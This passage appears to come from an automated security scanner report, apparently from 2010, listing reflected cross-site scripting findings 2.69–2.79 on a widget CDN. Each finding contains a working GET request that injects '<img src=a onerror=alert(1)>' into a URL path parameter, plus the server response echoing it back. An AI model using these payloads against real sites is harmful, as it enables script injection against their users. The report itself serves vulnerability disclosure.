Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:51 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17779


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
();

WIDGETBOX.platform.WidgetConfigPathHandler = {
initializationParams : {"id":"53234a87-ed5a-47ec-859e-f6aaec12e3ce","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http:e1858<img src=a onerror=alert(1)>142cee02189/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png","wbx_ns_link":"http:/ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.pla
...[SNIP]...

2.69. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 51606<img%20src%3da%20onerror%3dalert(1)>5910305e668 was submitted in the REST URL parameter 7. This input was echoed as 51606<img src=a onerror=alert(1)>5910305e668 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com51606<img%20src%3da%20onerror%3dalert(1)>5910305e668/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:54 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Content-Length: 17779
Connection: close


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
tform.WidgetConfigPathHandler = {
initializationParams : {"id":"53234a87-ed5a-47ec-859e-f6aaec12e3ce","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http:/img.widgetbox.com51606<img src=a onerror=alert(1)>5910305e668/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png","wbx_ns_link":"http:/ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfig
...[SNIP]...

2.70. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 7207f<img%20src%3da%20onerror%3dalert(1)>2037fd07834 was submitted in the REST URL parameter 8. This input was echoed as 7207f<img src=a onerror=alert(1)>2037fd07834 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded7207f<img%20src%3da%20onerror%3dalert(1)>2037fd07834/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:57 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17787


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
getConfigPathHandler = {
initializationParams : {"id":"53234a87-ed5a-47ec-859e-f6aaec12e3ce","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http:/img.widgetbox.com/uploaded7207f<img src=a onerror=alert(1)>2037fd07834/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png","wbx_ns_link":"http:/ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHandl
...[SNIP]...

2.71. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f2f8d<img%20src%3da%20onerror%3dalert(1)>aae1b279c95 was submitted in the REST URL parameter 9. This input was echoed as f2f8d<img src=a onerror=alert(1)>aae1b279c95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96f2f8d<img%20src%3da%20onerror%3dalert(1)>aae1b279c95/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:00 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17787


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
ializationParams : {"id":"53234a87-ed5a-47ec-859e-f6aaec12e3ce","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96f2f8d<img src=a onerror=alert(1)>aae1b279c95/ibmbackupm.png","wbx_ns_link":"http:/ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHandler.initializationParams["fif"];

...[SNIP]...

2.72. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 10]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 10 is copied into the HTML document as plain text between tags. The payload 5b7cf<img%20src%3da%20onerror%3dalert(1)>bbac3dee5f9 was submitted in the REST URL parameter 10. This input was echoed as 5b7cf<img src=a onerror=alert(1)>bbac3dee5f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:5b7cf<img%20src%3da%20onerror%3dalert(1)>bbac3dee5f9//ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:06 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17790


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
-4fa0-afc7-39d1d89ea475","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png","wbx_ns_link":"http:5b7cf<img src=a onerror=alert(1)>bbac3dee5f9//ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHandler.initializationParams["fif"];
if(fifMode && WIDGETBOX.platf
...[SNIP]...

2.73. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 11]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 11 is copied into the HTML document as plain text between tags. The payload ef608<img%20src%3da%20onerror%3dalert(1)>591e49029cb was submitted in the REST URL parameter 11. This input was echoed as ef608<img src=a onerror=alert(1)>591e49029cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.netef608<img%20src%3da%20onerror%3dalert(1)>591e49029cb/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:09 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17790


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
475","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png","wbx_ns_link":"http://ad.doubleclick.netef608<img src=a onerror=alert(1)>591e49029cb/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHandler.initializationParams["fif"];
if(fifMode && WIDGETBOX.platform.FriendlyIFrame){
...[SNIP]...

2.74. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 12]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 12 is copied into the HTML document as plain text between tags. The payload 7f6e7<img%20src%3da%20onerror%3dalert(1)>f5159348289 was submitted in the REST URL parameter 12. This input was echoed as 7f6e7<img src=a onerror=alert(1)>f5159348289 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk7f6e7<img%20src%3da%20onerror%3dalert(1)>f5159348289 HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:12 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17790


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
,"platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png","wbx_ns_link":"http://ad.doubleclick.net/clk7f6e7<img src=a onerror=alert(1)>f5159348289"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHandler.initializationParams["fif"];
if(fifMode && WIDGETBOX.platform.FriendlyIFrame){

...[SNIP]...

2.75. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f479f<img%20src%3da%20onerror%3dalert(1)>391274cdfc2 was submitted in the REST URL parameter 4. This input was echoed as f479f<img src=a onerror=alert(1)>391274cdfc2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/idf479f<img%20src%3da%20onerror%3dalert(1)>391274cdfc2/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:48 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17790


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
adyCallback, true);
}
};

WIDGETBOX.platform.WidgetConfig = WidgetConfig;
})();

WIDGETBOX.platform.WidgetConfigPathHandler = {
initializationParams : {"platform":"InsertWidget","idf479f<img src=a onerror=alert(1)>391274cdfc2":"8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475"},

configurationParams : {"wbx_ns_image":"http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png","wbx_ns_link":"http://ad.doubl
...[SNIP]...

2.76. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload dc396<img%20src%3da%20onerror%3dalert(1)>3789c81a41d was submitted in the REST URL parameter 5. This input was echoed as dc396<img src=a onerror=alert(1)>3789c81a41d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475dc396<img%20src%3da%20onerror%3dalert(1)>3789c81a41d/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:51 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17790


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
true);
}
};

WIDGETBOX.platform.WidgetConfig = WidgetConfig;
})();

WIDGETBOX.platform.WidgetConfigPathHandler = {
initializationParams : {"id":"8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475dc396<img src=a onerror=alert(1)>3789c81a41d","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png","wbx_ns_link":"http://ad.doubleclick.net/cl
...[SNIP]...

2.77. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload e1ad5<img%20src%3da%20onerror%3dalert(1)>e2109e2c33e was submitted in the REST URL parameter 6. This input was echoed as e1ad5<img src=a onerror=alert(1)>e2109e2c33e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:e1ad5<img%20src%3da%20onerror%3dalert(1)>e2109e2c33e//img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:54 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17790


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
();

WIDGETBOX.platform.WidgetConfigPathHandler = {
initializationParams : {"id":"8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http:e1ad5<img src=a onerror=alert(1)>e2109e2c33e//img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png","wbx_ns_link":"http://ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.
...[SNIP]...

2.78. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 7e6dd<img%20src%3da%20onerror%3dalert(1)>f1f9cf33df7 was submitted in the REST URL parameter 7. This input was echoed as 7e6dd<img src=a onerror=alert(1)>f1f9cf33df7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com7e6dd<img%20src%3da%20onerror%3dalert(1)>f1f9cf33df7/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:57 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17782


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
form.WidgetConfigPathHandler = {
initializationParams : {"id":"8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http://img.widgetbox.com7e6dd<img src=a onerror=alert(1)>f1f9cf33df7/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png","wbx_ns_link":"http://ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConf
...[SNIP]...

2.79. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload aa6fc<img%20src%3da%20onerror%3dalert(1)>c10e1999b07 was submitted in the REST URL parameter 8. This input was echoed as aa6fc<img src=a onerror=alert(1)>c10e1999b07 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploadedaa6fc<img%20src%3da%20onerror%3dalert(1)>c10e1999b07/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:59 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17790


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
etConfigPathHandler = {
initializationParams : {"id":"8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http://img.widgetbox.com/uploadedaa6fc<img src=a onerror=alert(1)>c10e1999b07/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png","wbx_ns_link":"http://ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHan
...[SNIP]...

2.80. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 9]

